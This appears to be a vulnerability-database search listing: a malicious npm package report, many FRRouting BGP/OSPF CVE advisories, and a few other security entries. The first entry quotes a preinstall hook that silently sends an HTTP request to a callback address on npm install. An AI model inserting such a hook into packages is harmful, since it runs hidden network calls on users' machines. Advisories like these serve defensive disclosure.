Malicious code in ect-839201 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3 package.json declares a preinstall lifecycle hook that runs node -e "require'http'.get'http://10.107.121.85:8001/callback839201'" on npm install. Thi...

Ubuntu 22.04 LTS / 24.04 LTS / 25.10 / 26.04 LTS : FRR vulnerabilities (USN-8376-1)

The remote Ubuntu 22.04 LTS / 24.04 LTS / 25.10 / 26.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-8376-1 advisory. It was discovered that FRR incorrectly handled certain OSPF Traffic Engineering and Segment Routing TLVs. An attacker cou...

SUSE-SU-2026:22026-1 Security update for frr

This update for frr fixes the following issues: - CVE-2026-5107: Fixed an improper access controls in EVPN Type-2 Route Handler bsc1261013. - CVE-2026-28532: Harden TE/SR TLV iteration against malformed lengths bsc1263859. - CVE-2026-37457: Fix off-by-one error in FlowSpec operator array bounds...

PT-2026-43275

Name of the Vulnerable Software and Affected Versions FastNetMon Community Edition versions prior to 1.2.10 Description Multiple out-of-bounds reads exist in the BGP MP REACH NLRI IPv6 attribute decoder. The decode mp reach ipv6 function in src/bgp protocol.cpp casts raw pointers to structure typ...

Missing Authorization

Overview Affected versions of this package are vulnerable to Missing Authorization in the 3gpp-traffic-influence API route group, which lacks inbound authorization checks. An attacker can create, read, modify, or delete traffic-influence subscriptions by sending unauthenticated or forged requests...

UBUNTU-CVE-2026-37458

Missing input validation in the MPREACHNLRI component of FRRouting FRR stable/10.0 to stable/10.6 allows authenticated attackers to cause a Denial of Service DoS via supplying a crafted UPDATE message...

FreeScout 1.8.206 Network Reachability and HTTP Security Audit Scanner

The provided PHP script is a network reconnaissance and auditing tool designed to scan a local IP range and identify reachable hosts potentially running web services such as FreeScout...

CLSA-2025-1762420748 frr: Fix of 4 CVEs

CVE-2023-41358: fix crash when processing NLRIs with zero attribute length - CVE-2023-47235: fix EOR handling to avoid unwanted processing of malformed attributes - CVE-2023-46753: fix mandatory attributes check for UPDATE messages with unknown transit attributes - CVE-2023-47234: fix handling...

frr: processes invalid NLRIs if attribute length is zero

A flaw was found in FRRouting, where it is susceptible to a denial of service vulnerability triggered by a NULL pointer dereference issue during the processing of Network Layer Reachability Information NLRIs with a zero attribute length. The vulnerability arises from inadequate validation of...

frr: processes invalid NLRIs if attribute length is zero

A flaw was found in FRRouting, where it is susceptible to a denial of service vulnerability triggered by a NULL pointer dereference issue during the processing of Network Layer Reachability Information NLRIs with a zero attribute length. The vulnerability arises from inadequate validation of...

An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur when processing a crafted BGP UPDATE message with a MP_UNREACH_NLRI attribute and additional NLRI data (that lacks mandatory path attributes).

...

UBUNTU-CVE-2023-38406

bgpd/bgpflowspec.c in FRRouting FRR before 8.4.3 mishandles an nlri length of zero, aka a "flowspec overflow."...

AZL-34690 CVE-2023-47234 affecting package frr for versions less than 9.1-2

An issue was discovered in FRRouting FRR through 9.0.1. A crash can occur when processing a crafted BGP UPDATE message with a MPUNREACHNLRI attribute and additional NLRI data that lacks mandatory path attributes...

CLSA-2023-1697817694 quagga: Fix of 2 CVEs

CVE-2023-41360: don't read the first byte of ORF header if we are ahead of stream - CVE-2023-41358: do not process NLRIs if the attribute length is zero...

DEBIAN-CVE-2023-41358

An issue was discovered in FRRouting FRR through 9.0. bgpd/bgppacket.c processes NLRIs if the attribute length is zero...

CVE-2018-16230

The BGP parser in tcpdump before 4.9.3 has a buffer over-read in print-bgp.c:bgpattrprint MPREACHNLRI...

NetScaler SD-WAN Troubleshooting Guide

Citrix SD-WAN, formerly NetScaler SD-WAN This articles helps you diagnose, troubleshoot, and resolve common issue encountered on NetScaler SD-WAN. Note : This is a master overview article. The detailed information for each topic is covered in its individual articles. CTX236987 - Information to Ke...